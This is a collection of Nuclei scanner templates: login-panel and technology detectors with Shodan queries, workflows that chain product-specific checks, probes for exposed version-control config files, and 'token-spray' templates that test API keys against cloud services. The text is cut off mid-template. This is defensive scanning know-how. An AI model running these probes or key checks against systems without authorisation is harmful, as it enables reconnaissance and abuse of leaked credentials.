-------------------------------------------------------------------------------- 1 | id: api-web3storage 2 | 3 | info: 4 | name: Web3 Storage API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.web3.storage/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Web3%20Storage.md 10 | tags: token-spray,web3storage 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.web3.storage/user/uploads HTTP/1.1 17 | Host: api.web3.storage 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"created"' 25 | - '"cid"' 26 | condition: and 27 | -------------------------------------------------------------------------------- /apisix-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: apisix-workflow 2 | 3 | info: 4 | name: Apache Apisix Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache Apisix related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/apache/apache-apisix-panel.yaml 10 | subtemplates: 11 | - tags: apisix -------------------------------------------------------------------------------- /argocd-login.yaml: -------------------------------------------------------------------------------- 1 | id: argocd-detect 2 | 3 | info: 4 | name: Argo CD Login Panel 5 | author: Adam Crosser,daffainfo 6 | severity: info 7 | description: An Argo CD login panel was discovered. 
8 | reference: 9 | - https://argoproj.github.io/cd/ 10 | classification: 11 | cwe-id: CWE-200 12 | metadata: 13 | shodan-query: http.title:"Argo CD" 14 | tags: panel,argocd,login,kubernetes 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/login" 20 | 21 | matchers-condition: and 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - 'Argo CD' 27 | 28 | - type: status 29 | status: 30 | - 200 31 | 32 | # Enhanced by mp on 2022/03/20 33 | -------------------------------------------------------------------------------- /artifactory-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: artifactory-workflow 2 | 3 | info: 4 | name: Artifactory Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Artifactory related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: artifactory 12 | subtemplates: 13 | - tags: artifactory 14 | -------------------------------------------------------------------------------- /avantfax-panel.yaml: -------------------------------------------------------------------------------- 1 | id: avantfax-panel 2 | 3 | info: 4 | name: AvantFAX Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | description: An AvantFAX login panel was discovered. 8 | reference: 9 | - http://www.avantfax.com/ 10 | classification: 11 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 12 | cvss-score: 5.3 13 | cwe-id: CWE-200 14 | metadata: 15 | shodan-query: http.title:"AvantFAX - Login" 16 | tags: panel,avantfax,login 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}" 22 | 23 | matchers-condition: and 24 | matchers: 25 | - type: word 26 | part: body 27 | words: 28 | - "- AvantFAX - Login" 29 | 30 | - type: status 31 | status: 32 | - 200 33 | 34 | extractors: 35 | - type: regex 36 | part: body 37 | group: 1 38 | regex: 39 | - '

([0-9.]+)<\/p>' 40 | 41 | # Enhanced by mp on 2022/03/20 42 | -------------------------------------------------------------------------------- /avantfax-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: avantfax-workflow 2 | 3 | info: 4 | name: AvantFAX Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all AvantFAX Pipeline related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/avantfax-panel.yaml 10 | subtemplates: 11 | - tags: avantfax 12 | -------------------------------------------------------------------------------- /aviatrix-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: aviatrix-workflow 2 | 3 | info: 4 | name: Aviatrix Controller Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Aviatrix Controller related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/aviatrix-panel.yaml 10 | subtemplates: 11 | - tags: aviatrix 12 | -------------------------------------------------------------------------------- /axigen-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: axigen-workflow 2 | 3 | info: 4 | name: Axigen Webmail Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Axigen Webmail related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/axigen-webmail.yaml 10 | subtemplates: 11 | - tags: axigen -------------------------------------------------------------------------------- /b2evolution-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: b2evolution-workflow 2 | 3 | info: 4 | name: b2evolution CMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all b2evolution CMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: b2evolution 12 | subtemplates: 13 | - tags: b2evolution -------------------------------------------------------------------------------- /bedita-panel.yaml: -------------------------------------------------------------------------------- 1 | id: bedita-panel 2 | 3 | info: 4 | name: BEdita Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"BEdita" 9 | tags: panel,bedita 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | part: body 20 | regex: 21 | - 'BEdita(.*)
' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | 27 | extractors: 28 | - type: regex 29 | part: body 30 | group: 1 31 | regex: 32 | - 'target="besite">(.*)
' 33 | -------------------------------------------------------------------------------- /bitrix-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: bitrix-workflow 2 | 3 | info: 4 | name: Bitrix Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Bitrix related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/bitrix-panel.yaml 10 | subtemplates: 11 | - tags: bitrix 12 | -------------------------------------------------------------------------------- /bookstack-panel.yaml: -------------------------------------------------------------------------------- 1 | id: bookstack-panel 2 | 3 | info: 4 | name: BookStack Panel Login 5 | author: cyllective,daffainfo 6 | severity: info 7 | description: A platform to create documentation/wiki content built with PHP & Laravel 8 | reference: 9 | - https://github.com/BookStackApp/BookStack 10 | metadata: 11 | shodan-query: http.title:"BookStack" 12 | tags: panel,bookstack 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/login" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | part: body 23 | condition: or 24 | words: 25 | - 'BookStack' 26 | - 'BookStack' 27 | 28 | - type: word 29 | part: header 30 | words: 31 | - 'Set-Cookie: bookstack_session' 32 | 33 | - type: status 34 | status: 35 | - 200 36 | 37 | extractors: 38 | - type: regex 39 | part: body 40 | group: 1 41 | regex: 42 | - '(?:app\.js|(?:print\-)?styles\.css)\?version=([\w\.\-]+)["'']>' 43 | -------------------------------------------------------------------------------- /bullwark-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: bullwark-workflow 2 | 3 | info: 4 | name: Bullwark Momentum Series Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Bullwark Momentum Series related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: bullwark 12 | subtemplates: 13 | - tags: bullwark -------------------------------------------------------------------------------- /cacti-panel.yaml: -------------------------------------------------------------------------------- 1 | id: cacti-panel 2 | 3 | info: 4 | name: Cacti Login Panel 5 | author: geeknik,daffainfo 6 | severity: info 7 | description: Cacti is a complete network graphing solution -- https://www.cacti.net/ 8 | tags: tech,cacti,login 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | - "{{BaseURL}}/cacti/" 15 | 16 | stop-at-first-match: true 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | part: body 25 | words: 26 | - "Login to Cacti" 27 | - "The Cacti Group" 28 | condition: and 29 | 30 | - type: regex 31 | part: header 32 | regex: 33 | - Cacti+ 34 | 35 | extractors: 36 | - type: regex 37 | part: body 38 | group: 1 39 | regex: 40 | - "

Version (.*) |" 41 | -------------------------------------------------------------------------------- /centos-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: centos-workflow 2 | 3 | info: 4 | name: Centos WebPanel Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Centos WebPanel related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/cwp-webpanel.yaml 10 | subtemplates: 11 | - tags: centos 12 | -------------------------------------------------------------------------------- /centreon-panel.yaml: -------------------------------------------------------------------------------- 1 | id: centreon-panel 2 | 3 | info: 4 | name: Centreon Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Centreon" 9 | tags: panel,centreon,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/centreon/index.php" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | condition: or 21 | words: 22 | - 'Centreon - IT & Network Monitoring' 23 | - 'Daybyday - Login" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /dedecms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: dedecms-workflow 2 | 3 | info: 4 | name: DedeCMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all DedeCMS related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: dedecms 12 | subtemplates: 13 | - tags: dedecms 14 | -------------------------------------------------------------------------------- /dolibarr-panel.yaml: -------------------------------------------------------------------------------- 1 | id: dolibarr-panel 2 | 3 | info: 4 | name: Dolibarr Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Dolibarr" 9 | tags: panel,dolibarr 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - 'Set-Cookie: DOLSESSID_' 22 | 23 | - type: word 24 | part: body 25 | words: 26 | - '' 27 | 28 | - type: status 29 | status: 30 | - 200 31 | 32 | extractors: 33 | - type: regex 34 | part: body 35 | group: 1 36 | regex: 37 | - 'Dolibarr ([0-9.]+)<\/td>' 38 | - 'Dolibarr ([0-9.]+)<\/td>' 39 | - '
Dolibarr ([0-9.]+)<\/div>' 40 | -------------------------------------------------------------------------------- /dolibarr-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: dolibarr-workflow 2 | 3 | info: 4 | name: Dolibarr Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Dolibarr related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/dolibarr-panel.yaml 10 | subtemplates: 11 | - tags: dolibarr -------------------------------------------------------------------------------- /dotclear-panel.yaml: -------------------------------------------------------------------------------- 1 | id: dotclear-panel 2 | 3 | info: 4 | name: Dotclear Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Dotclear" 9 | tags: panel,dotclear 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/dc2/admin/auth.php" 15 | - "{{BaseURL}}/auth.php" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - '' 22 | - 'Dotclear' 23 | condition: or 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /dotnetnuke-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: dotnetnuke-workflow 2 | 3 | info: 4 | name: DotNetNuke Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all DotNetNuke related nuclei templates on a given target. 
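7  |
8  | workflows:
9  |   - template: technologies/tech-detect.yaml
10 |     matchers:
11 |       - name: dotnetnuke
12 |         subtemplates:
13 |           - tags: dotnetnuke
--------------------------------------------------------------------------------
/druid-panel.yaml:
--------------------------------------------------------------------------------
1  | id: druid-panel
2  | # Reports a Druid monitor login page: GET /druid/login.html must answer 200 with "druid monitor" in the body.
3  | info:
4  |   name: Druid monitor Panel Login
5  |   author: pikpikcu,daffainfo
6  |   severity: info
7  |   tags: panel,druid
8  |
9  | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/druid/login.html"
13 |
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         part: body
18 |         words:
19 |           - "druid monitor"
20 |
21 |       - type: status
22 |         status:
23 |           - 200
24 |
--------------------------------------------------------------------------------
/drupal-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: drupal-workflow
2  | # Gated workflow: templates tagged "drupal" run only after tech-detect reports its "drupal" matcher.
3  | info:
4  |   name: Drupal Security Checks  # label agrees with the id, description and tag of this workflow
5  |   author: daffainfo
6  |   description: A simple workflow that runs all drupal related nuclei templates on a given target.
7  |
8  | workflows:
9  |   - template: technologies/tech-detect.yaml
10 |     matchers:
11 |       - name: drupal
12 |         subtemplates:
13 |           - tags: drupal
--------------------------------------------------------------------------------
/duomicms-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: duomicms-workflow
2  |
3  | info:
4  |   name: DuomiCMS Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all DuomiCMS related nuclei templates on a given target.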
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: duomicms 12 | subtemplates: 13 | - tags: duomicms -------------------------------------------------------------------------------- /emby-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: emby-workflow 2 | 3 | info: 4 | name: Emby Server Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Emby Server related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: emby 12 | subtemplates: 13 | - tags: emby -------------------------------------------------------------------------------- /ems-webclient-panel.yaml: -------------------------------------------------------------------------------- 1 | id: ems-webclient-panel 2 | 3 | info: 4 | name: EMS Web Client Panel Login 5 | author: pussycat0x,daffainfo 6 | severity: info 7 | metadata: 8 | google-dork: inurl:EMSWebClient/ 9 | tags: panel,ems 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/emswebclient/Login.aspx" 15 | - "{{BaseURL}}/Login.aspx" 16 | 17 | stop-at-first-match: true 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "EMS Web Client - Login" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | 29 | extractors: 30 | - type: regex 31 | part: body 32 | group: 1 33 | regex: 34 | - 'Web Client Version (.*)' -------------------------------------------------------------------------------- /episerver-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: episerver-workflow 2 | 3 | info: 4 | name: EpiServer Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all EpiServer related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: episerver 12 | subtemplates: 13 | - tags: episerver -------------------------------------------------------------------------------- /exposed-bitkeeper.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-bitkeeper 2 | 3 | info: 4 | name: Exposed BitKeeper Directory 5 | author: daffainfo 6 | severity: low 7 | reference: 8 | - https://www.bitkeeper.org/man/config-etc.html 9 | tags: config,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/BitKeeper/etc/config" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "BitKeeper configuration" 21 | - "logging" 22 | - "email" 23 | - "description" 24 | condition: and 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /exposed-bzr.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-bzr 2 | 3 | info: 4 | name: Exposed BZR Directory 5 | author: daffainfo 6 | severity: low 7 | reference: 8 | - http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html 9 | tags: config,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/.bzr/branch/branch.conf" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "parent_location" 21 | - "push_location" 22 | condition: or 23 | 24 | - type: status 25 | status: 26 | - 200 27 | 28 | - type: word 29 | part: header 30 | words: 31 | - "text/plain" -------------------------------------------------------------------------------- /exposed-darcs.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-darcs 2 | 3 | info: 4 | name: Exposed Darcs Config 5 | author: daffainfo 6 | severity: low 7 | reference: 8 | - 
http://darcs.net/Using/Configuration#sources 9 | tags: config,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/_darcs/prefs/binaries" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Binary file regexps" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /exposed-hg.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-hg 2 | 3 | info: 4 | name: Exposed HG Directory 5 | author: daffainfo 6 | severity: low 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.hg/hgrc" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "[paths]" 19 | - "default" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /feifeicms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: feifeicms-workflow 2 | 3 | info: 4 | name: FeiFeiCMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all FeiFeiCMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: feifeicms 12 | subtemplates: 13 | - tags: feifeicms -------------------------------------------------------------------------------- /finereport-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: finereport-workflow 2 | 3 | info: 4 | name: FineReport Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all FineReport related nuclei templates on a given target. 
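7  |
8  | workflows:
9  |   - template: technologies/fingerprinthub-web-fingerprints.yaml
10 |     matchers:
11 |       - name: finereport
12 |         subtemplates:
13 |           - tags: finereport
--------------------------------------------------------------------------------
/fortinet-panel.yaml:
--------------------------------------------------------------------------------
1  | id: fortinet-panel
2  | # Reports a Fortinet login page: GET on the base URL must answer 200 with 'FORTINET LOGIN' in the body.
3  | info:
4  |   name: Fortinet Panel Login
5  |   author: pikpikcu,daffainfo
6  |   severity: info
7  |   metadata:
8  |     shodan-query: http.title:"FORTINET LOGIN"
9  |   tags: panel,fortinet
10 |
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}"
15 |
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         part: body
20 |         words:
21 |           - 'FORTINET LOGIN'
22 |
23 |       - type: status
24 |         status:
25 |           - 200
26 |
--------------------------------------------------------------------------------
/fortinet-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: fortinet-workflow  # spelled like the file name and the fortinet tag, so a filter on the id finds it
2  | # Runs the templates tagged "fortinet" once exposed-panels/fortinet-panel.yaml has matched.
3  | info:
4  |   name: Fortinet Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all fortinet related nuclei templates on a given target.
7  |
8  | workflows:
9  |   - template: exposed-panels/fortinet-panel.yaml
10 |     subtemplates:
11 |       - tags: fortinet
--------------------------------------------------------------------------------
/gateone-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: gateone-workflow
2  |
3  | info:
4  |   name: GateOne Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all GateOne related nuclei templates on a given target.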
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: gateone 12 | subtemplates: 13 | - tags: gateone -------------------------------------------------------------------------------- /geowebserver-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: geowebserver-workflow 2 | 3 | info: 4 | name: GeoWebServer Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/geo-webserver.yaml 10 | subtemplates: 11 | - tags: geowebserver -------------------------------------------------------------------------------- /gespage-panel.yaml: -------------------------------------------------------------------------------- 1 | id: gespage-panel 2 | 3 | info: 4 | name: Gespage Panel Login 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: Path=/gespage 9 | tags: panel,gespage 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/gespage/webapp/login.xhtml" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - '' 22 | - '' 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | 29 | extractors: 30 | - type: regex 31 | part: body 32 | group: 1 33 | regex: 34 | - '\(Ver: ([0-9._A-Z]+)\)' 35 | -------------------------------------------------------------------------------- /gespage-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gespage-workflow 2 | 3 | info: 4 | name: Gespage Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Gespage related nuclei templates on a given target. 
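7  |
8  | workflows:
9  |   - template: exposed-panels/gespage-panel.yaml
10 |     subtemplates:
11 |       - tags: gespage
12 |
--------------------------------------------------------------------------------
/gitlist-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: gitlist-workflow
2  | # Gated workflow: templates tagged "gitlist" run only after tech-detect reports its "gitlist" matcher.
3  | info:
4  |   name: GitList Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all GitList related nuclei templates on a given target.
7  |
8  | workflows:
9  |   - template: technologies/tech-detect.yaml
10 |     matchers:
11 |       - name: gitlist
12 |         subtemplates:
13 |           - tags: gitlist
--------------------------------------------------------------------------------
/glpi-panel.yaml:
--------------------------------------------------------------------------------
1  | id: glpi-panel
2  | # Reports a GLPI login page on /, /glpi/ or /glpi2/ and extracts the v= value from the base.min.js asset URL.
3  | info:
4  |   name: GLPI Panel Login
5  |   author: dogasantos,daffainfo
6  |   severity: info
7  |   metadata:
8  |     shodan-query: http.title:"GLPI"
9  |   tags: panel,glpi
10 |
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}"
15 |       - "{{BaseURL}}/glpi/"
16 |       - "{{BaseURL}}/glpi2/"
17 |
18 |     stop-at-first-match: true
19 |     matchers-condition: and
20 |     matchers:
21 |       - type: word
22 |         words:
23 |           - "CFG_GLPI"
24 |           - "_glpi_csrf_token"
25 |           - "GLPI Copyright"
26 |         condition: and
27 |
28 |       - type: status
29 |         status:
30 |           - 200
31 |
32 |     extractors:
33 |       - type: regex
34 |         part: body
35 |         group: 1
36 |         regex:
37 |           - 'base\.min\.js\?v=(.*)'  # "." and "?" escaped: unescaped, "js?" made the "s" optional and the literal "?v=" never matched
--------------------------------------------------------------------------------
/glpi-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: glpi-workflow
2  |
3  | info:
4  |   name: GLPI Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all GLPI related nuclei templates on a given target.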
7 | 8 | workflows: 9 | - template: exposed-panels/glpi-panel.yaml 10 | subtemplates: 11 | - tags: glpi 12 | -------------------------------------------------------------------------------- /gogs-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gogs-workflow 2 | 3 | info: 4 | name: Gogs (Go Git Service) - Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Gogs related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/gogs-login.yaml 10 | subtemplates: 11 | - tags: gogs 12 | -------------------------------------------------------------------------------- /google-books.yaml: -------------------------------------------------------------------------------- 1 | id: api-googlebooks 2 | 3 | info: 4 | name: Google Books API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developers.google.com/books/docs/overview 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Books/Google%20Books.md 10 | tags: token-spray,google,books 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://www.googleapis.com/books/v1/volumes/zyTCAlFPjgYC?key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - "kind" 23 | - "id" 24 | - "etag" 25 | condition: and 26 | -------------------------------------------------------------------------------- /graphite-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: graphite-workflow 2 | 3 | info: 4 | name: Graphite Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Graphite related nuclei templates on a given target. 
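7  |
8  | workflows:
9  |   - template: exposed-panels/graphite-browser.yaml
10 |     subtemplates:
11 |       - tags: graphite
12 |
--------------------------------------------------------------------------------
/grav-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: grav-workflow
2  | # Runs the templates tagged "grav" once technologies/grav-cms-detect.yaml has matched.
3  | info:
4  |   name: Grav Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all Grav related nuclei templates on a given target.
7  |
8  | workflows:
9  |   - template: technologies/grav-cms-detect.yaml
10 |     subtemplates:
11 |       - tags: grav
12 |
--------------------------------------------------------------------------------
/gsoap-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: gsoap-workflow
2  | # The fingerprint template covers many products; a named matcher keeps the gsoap-tagged templates from running on every host it matches.
3  | info:
4  |   name: gSOAP Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all gSOAP related nuclei templates on a given target.
7  |
8  | workflows:
9  |   - template: technologies/fingerprinthub-web-fingerprints.yaml
10 |     matchers:
11 |       - name: gsoap  # NOTE(review): matcher name assumed to equal the tag, as in the other fingerprinthub workflows here; confirm against the fingerprint template
12 |         subtemplates:
13 |           - tags: gsoap
14 |
--------------------------------------------------------------------------------
/guacamole-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: guacamole-workflow
2  |
3  | info:
4  |   name: Apache Guacamole Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all Apache Guacamole related nuclei templates on a given target.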
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: guacamole 12 | subtemplates: 13 | - tags: guacamole -------------------------------------------------------------------------------- /h3c-imc-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: h3c-imc-workflow 2 | 3 | info: 4 | name: H3c IMC Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all H3c IMC related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: h3c-imc 12 | subtemplates: 13 | - tags: h3c-imc -------------------------------------------------------------------------------- /home-assistant-detect.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant-detect 2 | 3 | info: 4 | name: Home Assistant Detect 5 | author: fabaff,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Home Assistant" 9 | tags: tech,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - 'Home Assistant' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /igs-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: igs-workflow 2 | 3 | info: 4 | name: SAP Internet Graphics Server (IGS) Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SAP Internet Graphics Server (IGS) related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/sap/sap-igs-detect.yaml 10 | subtemplates: 11 | - tags: igs 12 | -------------------------------------------------------------------------------- /itop-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: itop-workflow 2 | 3 | info: 4 | name: iTop Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all iTop related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/itop-panel.yaml 10 | subtemplates: 11 | - tags: itop 12 | -------------------------------------------------------------------------------- /jaspersoft-panel.yaml: -------------------------------------------------------------------------------- 1 | id: jaspersoft-panel 2 | 3 | info: 4 | name: Jaspersoft Panel Login 5 | author: koti2,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Jaspersoft" 9 | tags: panel,jaspersoft 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/jasperserver/login.html?error=1" 15 | - "{{BaseURL}}/jasperserver-pro/login.html?error=1" 16 | 17 | stop-at-first-match: true 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "TIBCO Jaspersoft: Login" 23 | - "Could not login to JasperReports Server" 24 | - "About TIBCO JasperReports Server" 25 | condition: or 26 | 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /jboss-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jboss-detect 2 | 3 | info: 4 | name: JBoss detected 5 | author: daffainfo,idealphase 6 | severity: info 7 | tags: tech,jboss 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "JBoss EAP 7" 19 | 20 | - type: regex 21 | part: body 22 | regex: 23 | - 'Welcome to JBoss(.*)' 
24 | 25 | extractors: 26 | - type: regex 27 | group: 1 28 | part: body 29 | regex: 30 | - '

